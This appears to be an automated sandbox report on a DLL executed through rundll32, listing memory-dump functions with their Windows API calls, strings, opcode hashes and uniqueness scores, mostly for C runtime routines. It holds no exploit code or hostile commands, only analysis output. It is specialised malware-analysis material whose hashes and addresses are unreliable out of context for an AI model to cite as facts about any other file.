                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1519FB2A086239FDB1A8E55DC80BBA77A4FF45718F33452DE916962D0DF31E841C790
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6DE4120C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                          • API String ID: 0-2837366778
                                                                                                                                                                                                                                                          • Opcode ID: c749e2d4ba008c2660fa034f9073fb8ea25776f7cb4a2d28de819aa86a791e03
                                                                                                                                                                                                                                                          • Instruction ID: 0f2e82e49dea864df4d875295f818627a349fc2bdccb5d8702f8b1dc0d03c57b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c749e2d4ba008c2660fa034f9073fb8ea25776f7cb4a2d28de819aa86a791e03
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A21B371608216AF9F105FE5AC8096777BCAB4136C721C618FA28E7240FF31EC6197A4
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE457C7
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: HeapFree.KERNEL32(00000000,00000000,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?), ref: 6DE3D6A0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: GetLastError.KERNEL32(?,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?,?), ref: 6DE3D6B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE457D9
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE457EB
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE457FD
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE4580F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 381ed92e3f1534d124e9050bffa1bb327f74dfe3a711358359adfa0a082634e3
                                                                                                                                                                                                                                                          • Instruction ID: 4c6ab16b10501415342094093a920ecc4d1ccb2ada109573dd0611fe0c28dfc9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 381ed92e3f1534d124e9050bffa1bb327f74dfe3a711358359adfa0a082634e3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84F04932408225DBDB90DA59E8C4C7A73F9BB467187B28819F42CE7600CF31F890CEA4
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                          • String ID: *?
                                                                                                                                                                                                                                                          • API String ID: 269201875-2564092906
                                                                                                                                                                                                                                                          • Opcode ID: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                          • Instruction ID: 820e05b3ff5fe130afd44aac70e94c5517b75bf37d74d7d8dc87d43707ebdd3d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE617CB5E0421A9FCB14CFA9D8805EDFBF5EF88314B25816AE814F7340DB71AE418B90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6DE38E5F
                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6DE38F13
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                          • String ID: csm$ym
                                                                                                                                                                                                                                                          • API String ID: 3480331319-4111166203
                                                                                                                                                                                                                                                          • Opcode ID: e97a5bfdf0a398549adb7b33e8f400e3f6c969c3605169478636969f6cc65715
                                                                                                                                                                                                                                                          • Instruction ID: 8a3c281821601d0eeeb11ea45d9d104d5452530c8ee51a0dbc291200f708c902
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e97a5bfdf0a398549adb7b33e8f400e3f6c969c3605169478636969f6cc65715
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B41C7349141299BCF04DF69CCC4ABEBBB5BF4531CF228159D914AB351CB32EA41CB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 6DE398AB
                                                                                                                                                                                                                                                          • CatchIt.LIBVCRUNTIME ref: 6DE39991
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CatchEncodePointer
                                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                                          • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                                                          • Opcode ID: d32ef6b4e60858bbd101c5b086ec171ac8ff0adf43bcebf84dc182cd933d817e
                                                                                                                                                                                                                                                          • Instruction ID: 42be1ce98b41d84d42d050a7c4c2d7ac66ee565f5f8038376faa1365163e1fce
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d32ef6b4e60858bbd101c5b086ec171ac8ff0adf43bcebf84dc182cd933d817e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C41597290422AAFCF05CF94CD80AFE7BB5BF48308F264099FA1977211DB35A951DB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,6DE6947C,00000000,?,?,6DE3C2C2,?,?,6DE3C28A,?,?,?), ref: 6DE3C325
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,6DE69494), ref: 6DE3C338
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,6DE3C2C2,?,?,6DE3C28A,?,?,?), ref: 6DE3C35B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                          • String ID: ym
                                                                                                                                                                                                                                                          • API String ID: 4061214504-2567925931
                                                                                                                                                                                                                                                          • Opcode ID: e639ec9dc02963fb2e5faf2fa4ed08f8fc0737349a26dd32cea1e44a59ea0dd8
                                                                                                                                                                                                                                                          • Instruction ID: 32957503c2ed312e37dd63c262b08937217ca9bbe547b66f44b02af49c5ecee7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e639ec9dc02963fb2e5faf2fa4ed08f8fc0737349a26dd32cea1e44a59ea0dd8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0F08231600129FBDF02AB51CD49BEE7BB4EB04755F2100A4E905B1250CF71CE41DA90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE46DAD
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE46DD6
                                                                                                                                                                                                                                                          • SetEndOfFile.KERNEL32(00000000,6DE44603,00000000,6DE3FCD2,?,?,?,?,?,?,?,6DE44603,6DE3FCD2,00000000), ref: 6DE46E08
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6DE44603,6DE3FCD2,00000000,?,?,?,?,00000000,?), ref: 6DE46E24
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFileLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1547350101-0
                                                                                                                                                                                                                                                          • Opcode ID: 75df27e89ade8bb884869c7890c96f5f31679b21b2ef7172a58ad1a4354ae2e0
                                                                                                                                                                                                                                                          • Instruction ID: 746c7ccaf5103844d251ff9d8718369262052cba81f2b4a5b76cedebaae49d0f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75df27e89ade8bb884869c7890c96f5f31679b21b2ef7172a58ad1a4354ae2e0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 264117769046059BDB01AFB8EC00BEE37B5AF45368F32811CF624B72A0DF31D95587A1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6DE410C1: _free.LIBCMT ref: 6DE410CF
                                                                                                                                                                                                                                                            • Part of subcall function 6DE41C1A: WideCharToMultiByte.KERNEL32(?,00000000,6DE3F667,00000000,00000001,6DE3F5F6,6DE43EDB,?,6DE3F667,?,00000000,?,6DE43C4A,0000FDE9,00000000,?), ref: 6DE41CBC
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6DE40B07
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6DE40B0E
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6DE40B4D
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6DE40B54
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 167067550-0
                                                                                                                                                                                                                                                          • Opcode ID: b838fe768b3ecd280991d33289ed03799240ae7edb2787f24f33488fc80e67da
                                                                                                                                                                                                                                                          • Instruction ID: 7d4071cadcf108e82e736539f580357e30e858956c8ca9733bc3adff1ab9b2a0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b838fe768b3ecd280991d33289ed03799240ae7edb2787f24f33488fc80e67da
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9721D871608616AFDB109FA79C80C6777BCEF5136C721C528F91897240DF31EC518B94
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2c34c66aeaf2d24ee903d642749afd8c60a49eb4fd9f96f7b5e5e4e13af7c5f2
                                                                                                                                                                                                                                                          • Instruction ID: 82098994c70efd8d4e3c45957d7e2b321e27556d5e411c82d170fecc0eb5ad0b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c34c66aeaf2d24ee903d642749afd8c60a49eb4fd9f96f7b5e5e4e13af7c5f2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F21D879E45222A7DF129AA5AC40B2F36A8AF03768F328115ED15B7380EF30E911C5E0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,6DE43991,?,00000001,6DE3F667,?,6DE43E50,00000001,?,?,?,6DE3F5F6,?,?), ref: 6DE3D3B1
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D40E
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D444
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,6DE700D0,000000FF,?,6DE43E50,00000001,?,?,?,6DE3F5F6,?,?,?,6DE6EBD8,0000002C,6DE3F667), ref: 6DE3D44F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2283115069-0
                                                                                                                                                                                                                                                          • Opcode ID: 85f3b7dacf12c8771ae3a1d947fea0f61d7a7e976cdcf11e8d856383d4590544
                                                                                                                                                                                                                                                          • Instruction ID: 602da665b5cb33fdff0c97ad21f4106d8734112eae75152d3f2ebf50e4edafbf
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85f3b7dacf12c8771ae3a1d947fea0f61d7a7e976cdcf11e8d856383d4590544
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20118D362082216BD75656759C84B7A21F9B7D267CF37452CF628E32D0DF618C11C521
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000001,00000001,6DE70096,6DE3D67C,6DE3D707,6DE70094,?,6DE37E19,6DE70096,6DE70094,?,?,?,6DE34DCE,00000001,6DE70098), ref: 6DE3D508
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D565
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D59B
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,6DE700D0,000000FF,?,6DE37E19,6DE70096,6DE70094,?,?,?,6DE34DCE,00000001,6DE70098), ref: 6DE3D5A6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2283115069-0
                                                                                                                                                                                                                                                          • Opcode ID: b0e8c282f9a9eae96fa266ff014c0e8eb3ce9a05ff5a847bd6fa839d9bb075dd
                                                                                                                                                                                                                                                          • Instruction ID: e8e244a7054557dc06ddc2fe4966b906fe24a1379df690bf524f210871c4670e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0e8c282f9a9eae96fa266ff014c0e8eb3ce9a05ff5a847bd6fa839d9bb075dd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2311A33A248321BAEB5256659C80F3A31B9A7D227CF334628F628E22C0DF628815C121
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,6DE3A304,?,?,6DE7C7C4,00000000,?,6DE3A42F,00000004,6DE693A4,6DE6939C,6DE693A4,00000000), ref: 6DE3A2D3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                                                          • Opcode ID: c552bafe0f76c1889c5f5f5332c078ca48f1cb7a43a23984940150e32eb1eeee
                                                                                                                                                                                                                                                          • Instruction ID: 090efdac8c241f77240bde0cc2ff51d720eb31034e8731b7659798bb544ac53c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c552bafe0f76c1889c5f5f5332c078ca48f1cb7a43a23984940150e32eb1eeee
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F411A336AC5632ABDF129A688C40F7A33F8AB02764F234114FD10B7380DB71E981C6D1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(?,?,6DE3F667,00000000,?,?,6DE46B80,?,00000001,?,00000001,?,6DE43920,00000000,?,00000001), ref: 6DE47C03
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,6DE46B80,?,00000001,?,00000001,?,6DE43920,00000000,?,00000001,00000000,00000001,?,6DE43E74,6DE3F5F6), ref: 6DE47C0F
                                                                                                                                                                                                                                                            • Part of subcall function 6DE47BD5: CloseHandle.KERNEL32(6DE70910,6DE47C1F,?,6DE46B80,?,00000001,?,00000001,?,6DE43920,00000000,?,00000001,00000000,00000001), ref: 6DE47BE5
                                                                                                                                                                                                                                                          • ___initconout.LIBCMT ref: 6DE47C1F
                                                                                                                                                                                                                                                            • Part of subcall function 6DE47B97: CreateFileW.KERNEL32(6DE6DD58,40000000,00000003,00000000,00000003,00000000,00000000,6DE47BC6,6DE46B6D,00000001,?,6DE43920,00000000,?,00000001,00000000), ref: 6DE47BAA
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(?,?,6DE3F667,00000000,?,6DE46B80,?,00000001,?,00000001,?,6DE43920,00000000,?,00000001,00000000), ref: 6DE47C34
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2744216297-0
                                                                                                                                                                                                                                                          • Opcode ID: 71442192e457935bb9fc9bebdd1fde22d1d08fb711d40f7acd0f666c89f47159
                                                                                                                                                                                                                                                          • Instruction ID: 857b38e379a6607ce46a2f58ef36bf43df82ef0b2be58f83381681d805834032
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71442192e457935bb9fc9bebdd1fde22d1d08fb711d40f7acd0f666c89f47159
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3F01C36501129BBDF626FD1DD08A9A3FB6EB4A3A4F118014FE18A5260CB328960DBD0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.481632739.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                          • API String ID: 0-2837366778
                                                                                                                                                                                                                                                          • Opcode ID: c9fd5fa1f136a00acad8e2434a43b89b3b218200add9d67ef45a5da2d61128a3
                                                                                                                                                                                                                                                          • Instruction ID: 1177f8be6ac38978d84a475a5888ab8d44364a7ff606dbb0b8f5564a53dbfe10
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9fd5fa1f136a00acad8e2434a43b89b3b218200add9d67ef45a5da2d61128a3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18414771B44235ABDB12DF999C809BEBBF8EF86314F32405AE514A7340DB71DA41C754
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%